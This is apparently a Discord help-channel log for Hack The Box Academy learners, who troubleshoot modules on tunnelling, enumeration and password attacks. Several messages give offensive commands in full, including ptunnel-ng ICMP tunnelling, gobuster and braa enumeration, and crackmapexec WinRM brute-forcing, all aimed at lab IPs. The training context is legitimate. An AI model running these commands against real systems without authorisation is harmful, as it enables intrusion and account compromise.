I m just learning cause my brother is senior in this field he connected me with discord and Russian and he is so rude

I did, somehow my VPN was switched to a different region

Ok

That’s a you problem. We can’t help you with this.

This channel is for help with academy learning modules https://academy.hackthebox.com

I m not asking anything I m just stating bruhh

That’s okay. This is for academy help only. Other than that, we can not help.

Maybe he's rude because he doesn't want to teach you the basics or you're too impatient to learn the basics

I m damn impatient!! You're right

Academy is a great place to learn the basics in a controlled environment

And he told me to firstly complete comptia+ os+ network+ and security+ course but I didn't 😅.I m dumb as luffy !!

May I will try in future

Hey, @storm elk
Have you done the Whitebox Attacks module?
Can’t seem to find the right payload on the client side prototype pollution section

can someone give me a lightly better explanation of braa <community string>@<IP>:.1.3.6.* , if im not mistaken, the .1.3.6.* part is the OID, but how is this chosen in the module for me to enumerate against ? is 1.3.6.* randomly chosen ?

I have finished the path, I can look at my notes tomorrow 🙂 feel free to dm me a reminder

Hey guys when submitting answers, in hack the box, do they have to be exact? To move on ? (I’m very new, and I’m pretty sure I have the answer but not the format )

Sure! Will do! Thanks

Yes

I believe so. Make sure there’s no leading/trailing spaces

Yeah, I usually have to delete some space behind the flag

I have a question. How are we supposed to access the strong password for the decryption key of our operating system if the password manager is inside the operating system?

Wym? What module

I’m just trying to answer “what does the acronym for Linex PAM Stand for ?” And I’m putting “Pluggable Authentication Modules” and it’s not working ?

Its part of the Setting Up module, when it talks about strong passwords and reusability. Later on it teaches how to install Linux on a vm with encryption and advises us to use a strong password for the decryption key. But how can you access it if the password manager you're using on the web is inside the os? Do you need to use your phone to access the password manager every time?

that is definitely the answer but you are probably messing up spaces

probably a whitespace that you don't see

Hey guys,
Does anyone know of a free alternative tool to a reverse image search like pimeyes?

Thanks 😭 I just got it I was stuck for 30min

no worries

I don’t think you use a password manager for the decryption key

U have to remember that

You generally wouldn't store the os password on the os you're needing it for

Google can search for images too

Like locking your keys in the car

Yeah, I’m looking for one that correlates specifically faces. Thanks though!

Does anyone have comptia certs?

I'm sure some do

But what's your actual question turnip boy

Might be worth asking in #careers-and-certs

I guess you're right. Thank you.

In the same vein, you don't have to set up encryption on your vm

What about on a physical machine, then?

Only if you're paranoid

Physical machine it is then.

?

Whatever boats your float

I just don't want someone close to me in the real world finding out my user password and looking on my laptop while I'm not there. They'd have to know the encryption key too.

tineye, google lense

trying to do the nessus skill assesment but i cant seem to get nessus to launch. im putting 'https://localhost:8834' into the firefox browser of the pwnbox and just cant get a connection

I am finishing the pivoting module but I keep having the same problem again. I struggle when performing host discovery in an internal network doing dynamic SSH port forwarding. Particularly when trying to detect windows targets which have ICMP disabled. Any idea how to speed up the host discovery?? By using another technique or smth...

it won't be on the pwnbox

it'll be on the spawned target https://targetIP:8834/

nessus isn't installed on the pwnbox afaik

tried the targetIP as well from the browser in the pwnbox and same thing happened

im assuming the VM in the nessus skill assesment mentioned here is the pwnbox

it is not

the target VM is the one that's spawned with "Click here to spawn target"

aaah okay, once i spawn the target what do i do with the IP?

trying to connect to that targetIP:8834 still gives the same result

just visit it in the browser

yes thats what im doing. getting a connection error

can you share a screenshot?

i think something is wrong with my internet cause i tried to restart the machine and ive been stuck on this screen for 10 minutes

Hello,

Apologies if this is a dumb question/issue, I would appreciate any help or support.

I'm encountering an issue with ICMP Tunneling with SOCKS in the Pivoting, Tunneling, and Port Forwarding module

When running:

sudo ./ptunnel-ng/src/ptunnel-ng -r10.129.37.87 -R22

I get this error:

./ptunnel-ng/src/ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory

This happens on the Ubuntu pivot host (10.129.37.87), which doesn't have internet access.
Here’s what I did:

1. Cloned the repository:

git clone https://github.com/utoni/ptunnel-ng.git

2. Navigated to the directory:

cd ptunnel-ng/

3. Ran the autogen script:

./autogen.sh

4. Transferred the directory to the pivot host using SCP:

scp -r ptunnel-ng ubuntu@10.129.37.87:~/

Should these dependencies be statically linked before transferring ptunnel-ng? Or should it be rebuilt with the dependencies on the pivot host? Could this be an issue with the pivot host itself? Any help or clarifications would be appreciated.

in wireshark when i try to filter by mac address the syntax is hw_mac or hw.mac?

try to refresh the page of htb

hey does anyone test malwares and ransomewares for fun or is it just me?

guys I have been stuck at a section for like an hour now and only found out what to do by researching for an answer online and I really want to know if I did anything wrong or misunderstood something

anybody has a few minutes to spare?

I didn't get the robots.txt as a result even though robots is in the namelist

Hey all I am pretty new to pentesting / HTB I'm almost done with the NMAP module in academy and some walkthroughs in Labs.

I am a web programmer by trade that has been working on his own Cryptographic Libraries for about 1.5 years in C#/Rust through an FFI layer, I didn't write the algos myself but I constructed a usable library in most cases. I've worked on my own authentication systems quite a bit because I find security interesting. What module in academy is worth purchasing for someone like me? I also have some Active Directory experience from years ago as an Admin. I still wanna get my lab up and running for some YouTube videos there.

I don't have enough cubes at the moment so I would have to buy which is fine.

You should probably start with the free tier0 stuff

Yoo

Can newbies type in general

how much HTB credits you have?

I have 16 cubes, I just picked up "Setting Up" for 10.

Do u guyz like kali or has anyone used black arch before

And please, you can ask this questions in #general , this channel is only for questions related to problems in modules.

I have a arch install with hyprdots config, and I started reading some books. Got some different distros. Just curious since Kali is Debian based, and arch uses Pac-Man

Ah they told me to ask here. My bad 😆

I don’t have access to general chat atm so this is kinda the only place to ask questions

lol

just use kali or parrot bro

The Tier 0 are effectively free, start doing those

To find .txt you probably need to specify an extension with -x

Htb has parrot as a workstation

idk then butWell then I'm not sure where you should ask, but regarding the price of the modules I recommend doing all the tier 0 ones and then moving on to the next ones since the higher the difficulty the higher the price.

some tools on arch are really outdated and dont work

in my experience

I’ve looked through the tools and they have a lot however Kali is probably tested and updated more regularly

Parrot and Kali are both Debian based, either is fine I wouldnt do black arch unless you wanna really customize your life and converting tools

I am missing something then because I didn't see a bunch of free ones that last time I looked but that was months ago. Thanks I'll take another deeper look and see what is out there.

They cost 10 cubes and give 10 cubes

Appreciate you

Thanks!

i was doing the same ur doing but i ended up just getting a kali vm on arch

Nice

I like hyprland and the hyprdot look and feel but I use both as a vm. Arch and kali

hm? How do you think it should be instead of
gobuster dir --url http://94.237.59.199:56159/ -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt
I used the same line from the section and it didn't have it in there

I would send a video but don’t have access to posting photos or videos atm

No, search the docs for "extension". -x
I'm mobile now so can't help further, but I'll check back in when I'm at my deck.

https://github.com/OJ/gobuster

what module

Getting Started; Section Web Enumeration

ur looking for robots.txt?

i found it in 20 seconds

that wordlist u choose is really big and doesnt have robots.txt

/usr/share/wordlists/dirb/common.txt is the first wordlist i always try

Ok, I'm sitting down and gave it a shot. Your wordlist will work (but it is huge), but you need to use the -x argument to specify an extension. It will find both the wordpress directory and robots.txt.

I guess you can use a wordlist that contains both directories and files, but using the extension argument seems more flexible.

You good?

kinda confused where u got that wordlist tho

i cant find it in the section

eh. I tended to experiment with wordlists through those modules instead of exactly what was in the reading myself.

My pc Internet just went out so got on my phone

I actually cant find the one you are using

so if I just add -x at the end it should work out?

/usr/share/dirb/wordlists/common.txt

probably diff on ur machine

yes but that would double the amount of words and take much longer

Yeah I will try it in a second when my internet goes back up in a second

just it is 1am already and wont be able to sleep if I dont know how to make it work lol

Error: flag needs an argument: 'x' in -x

okay so the -x didn't work, and the common.txt file from the site just doesn't exist at that location and found another in /usr/share/seclists/Discovery/Web-Content/common.txt .
And now I also got the exact result I found in the YT Videos and the guide on the page

Just for refrence, the path doesnt lead to the file

Yeah you will have to use the “locate” command to find stuff depending on the distro

I had issues with getting gobuster to get the extension

Worked fine with ffuf

Literally the similar syntax just replacing x with e

Also -x requires at least one extension

Yeah, and ffuf is super fast

Which is why it yelled at you

It's in the name

Fuzz [fast]er u fool

yeah I used locate at the end, but kind of dissapointed, because I used the pwnbox and the location on their guide should be the same on their own distro and mashines that they are using but idk

I guess it changed over time and it didn't get updated maybe? just confused

It's due to the recent pwnbox changes

Literally within the last month or two

Ahh okay I have been on a wild goose chase for the last like 1 1/2 hours to find that one file

And from what I hear, it's a major PITA to update the guides

or thought I had an error in the line or smth

The seclist common.txt is the same thing

With a handful more lines

Source: I've run a diff on them

I just got htb a couple days ago so no wonder

thank you for the info though 😭 🙏

👍

They're likely working on updating guides and such and gonna push a mass update to them

As I've been told, updating them individually is a PITA

Like as a question from my side, how do you just remember all these lines and commands and tools when at some point doing actual practices on mashines

I am so overwhelmed rn with all the tools I am getting thrown at

do it for a year or two

youll remember most of them

besides that just take notes and use googles

Command kinda nice

also remember -h and man are your friends

Never seen that

Literally just repetition

And notes

diff has many options to make things super nice

If you're unsure why 2 files that should be the same, aren't

One of the random things that I saw happen was downloading something from the site via a download button resulted in a file with CRLF characters [common for windows] instead of new line [for other OS], so it wasn't working properly

diff showed every line was different, even though they appeared the same

Is there a maximum duration for Password attack modules recommended?

Generally if you don't get the password within 30 minutes you're doing something wrong

ok

There's some bits that are somewhat intentionally a bit longer

But it's slightly more realistic

Not everything is gonna be instant

I mean sure but I also have to manage my time

that and when I have a server with 8 a100s in it, it does be going fast

oh okay you have to download shit from the website for your list

If there's a resources button there's a non-zero chance it's needed

Are they per section or per whole module?

They should put the button here

htb is free to use this in their design documentations

Per whole module

And the download is usually near the top

ew even worse

¯_(ツ)_/¯

It's a button labeled "resources"

yeah I got it

just didnt know I even needed it

Also idk how you got to that point iirc you needed to create a mutated wordlist prior to that section

no

this is the first section

Ah

Ok

But yeah the password and user list is super useful here

its deff shorter then seclist username and rockyou

Most wordlists are shorter than rockyou

You should basically never use rockyou for bruteforcing

hi

yo

i only use rockyou2024 for bruteforcing

i use rockyou for fuzzing ☠️

God your fuzzing must take ages

How do u get access to type in general

read #welcome and follow the steps

waited 40 minutes no luck

revert box hydra finds brute force in like 2 minutes ☠️

hey were you able to figure this out? i'm wanting to practice that method as well

@wary tendon ; did you log out and back in?

also many people do AEN blind as the module itself is the walkthrough

so it's a bit more taboo to ask about that module

with windows whenever you make changes to a user you are logged in as, the changes don't take place until the next user log on

I've been trying but its difficult. Do you mean log out of rdp and back in again?

yes

not closing your RDP window

actually clicking on "Log Out/Sign Out"

I just signing out

In windows right in the rdp session

from the windows menu

¯_(ツ)_/¯

No I have not🥲

I guess for the changes to take effect

I shall see thanks ill give it a shot tomorrow

Even signing in though from the same session after adding to group didn't work

I mean running cmd and ps as admin

did you try selecting other sign in options when trying to run as admin?

:)

Would changes not take effect automatically

once relogged, yes

I am stuck on the question, any suggestion?

Windows dislikes making changes to objects that are in use

are you using the password list from resources?

Ok I have not reblogged out and in

well signing out and back in is re-logging

yeah

and the username list?

yup

syntax?

crackmapexec winrm <target_ip> -u username.list -p password.list

what am i missing?

are you getting errors or are you just not getting the answer

just ran it on my machine (with netexec) and it worked just fine

it works fine but not getting answer

i got the answer just fine for me

¯_(ツ)_/¯

md5sum username.list password.list 
75cc560d46286d74e73b85b2a5183e63  username.list
c75d6ec1311119028b89edaca8240603  password.list

in my case it(bruteforce) goes on and on

it will take a few minutes

don't expect much instant gratification from this module

this is definitely a module that tests patience

I ran it for 30 minutes and the list brute-force does not finish

it definitely shouldn't take 30 minutes

try respawning your target

also just as a sanity check can you verify your username.list and password.list md5sum matches mine?

let me check

75cc560d46286d74e73b85b2a5183e63 username.list
c75d6ec1311119028b89edaca8240603 password.list

it is same

ok

then i suggest restarting the target

and trying again

what is the use of "custom.rule"?

it's used in the next section

and explained there

let me try again with netexe

Note; during this conversation I ran it twice and got the expected login info

are you using 'crackmapexec' or 'netexec' tool?

netexec

netexec is crackmapexec

it's literally the same devs that were maintaining the cme tool, and then a dispute happened and now we have netexec

cme has been archived for a while at this point

wow

https://www.netexec.wiki/getting-started/installation/installation-on-unix

these lists contains 102 users and 204 passwords, so how you are getting answer in two minutes!!

The user and password aren't at the bottom of these lists

Netexec rotates through usernames first

So it'll try the first password against all users, then second...

Why when trying to resolve some domain names it returns something like 192.168.0.1.in-addr.arpa that part after the IP?

Any one completed "ADVANCED XSS AND CSRF EXPLOITATION" section "XSS Filter Bypasses"?
Been stuck for days, I managed to bypass using <iframe> payload but cant trigger admin page

skill issue

what does that mean

Is it only mine or do you guys also experience issue when opening HTB academy inside pwnbox browser to download a file let’s say nix.zip ?? It weirds out by flickering the screen and constantly changing the size of the pwnbox inside the browser making it difficult to navigate

https://academy.hackthebox.com/achievement/221679/144
yay

that may be because you have it opened in a new window (full screen) if so, its trying to keep up with the window on the module page and the full screen on the other tab

Is there a solution to it?

cope, like i do 😛

Hahaha…Tried doing that for like 15 mins or so but frustrated now since I wasn’t able to download a single attached file to complete the task at hand 🥲

Does anyone know the problem with the Windows Fundamental Module? I can't connect to the target through RDP, I can't ping it, even the Pwnbox can't connect. But other modules are working fine.